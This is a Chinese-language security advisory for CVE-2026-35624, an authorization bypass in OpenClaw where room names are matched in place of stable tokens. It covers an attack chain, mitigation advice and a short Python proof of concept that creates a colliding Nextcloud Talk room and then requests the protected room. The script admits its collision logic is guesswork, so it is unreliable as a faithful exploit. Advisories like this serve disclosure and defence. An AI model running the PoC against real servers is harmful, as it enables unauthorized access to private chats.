CVE-2026-35624 CVSS 4.2 中危

CVE-2026-35624 OpenClaw 房间授权策略混淆漏洞

披露日期: 2026-04-09

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-35624

漏洞类型

权限绕过

CVSS评分

4.2 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw 2026.3.22 之前的版本存在策略混淆漏洞。由于房间授权机制将冲突的房间名称误认为稳定的房间令牌，攻击者可利用相似名称的房间绕过允许列表策略，从而未经授权访问受保护的 Nextcloud Talk 聊天室。

技术细节

该漏洞源于 OpenClaw 在房间授权逻辑中使用了不稳定的房间名称进行匹配，而非使用唯一的房间令牌。这种设计缺陷导致了策略混淆，使得系统无法准确区分合法的受保护房间和攻击者构造的恶意房间。攻击者仅需拥有低权限账户，便可创建一个与目标受保护房间名称产生哈希冲突或满足匹配逻辑的新房间。当系统进行权限校验时，由于错误的匹配机制，该恶意房间会被允许列表误认为是合法房间，从而允许攻击者绕过原本的访问控制限制，进入受限的 Nextcloud Talk 房间获取敏感信息。

攻击链分析

STEP 1

侦察

攻击者识别目标 Nextcloud Talk 环境中受保护的房间名称或允许列表策略。

STEP 2

构造冲突

攻击者利用低权限账户创建一个新的房间，其名称经过精心设计，以触发授权系统的名称匹配冲突。

STEP 3

权限绕过

当系统验证房间访问权限时，由于漏洞逻辑，将新创建的房间误认为是允许列表中的合法房间。

STEP 4

未授权访问

攻击者成功进入受保护的聊天室，获取机密信息或进行监听。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit_openclaw(target_url, session_cookie, target_room_name):
    """
    PoC for CVE-2026-35624
    Demonstrates bypassing allowlist via room name collision.
    """
    headers = {
        "Cookie": f"session={session_cookie}"
    }
    
    # Step 1: Create a room with a colliding name
    # The exact collision logic depends on implementation (e.g., truncation, case insensitivity)
    collision_payload = {
        "roomType": "group",
        "roomName": target_room_name  # Or a variation that triggers the collision
    }
    
    print("[*] Attempting to create colliding room...")
    create_resp = requests.post(f"{target_url}/ocs/v2.php/apps/spreed/api/v4/room", json=collision_payload, headers=headers)
    
    if create_resp.status_code == 200:
        print("[+] Room created successfully.")
        # Step 2: Attempt to access the protected resource using the policy confusion
        access_resp = requests.get(f"{target_url}/index.php/call/{target_room_name}", headers=headers)
        if access_resp.status_code == 200:
            print("[!] Successfully bypassed policy and accessed the room.")
        else:
            print("[-] Access denied.")
    else:
        print("[-] Failed to create room.")

# Example usage
# exploit_openclaw("https://example.com", "attacker_cookie", "Protected_Meeting")

影响范围

OpenClaw < 2026.3.22

防御指南

临时缓解措施

建议立即升级至修复版本。如无法升级，应暂时禁用普通用户创建公开群组房间的权限，并加强对房间访问日志的审计，监控是否存在异常的房间名称匹配或未授权的访问行为。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表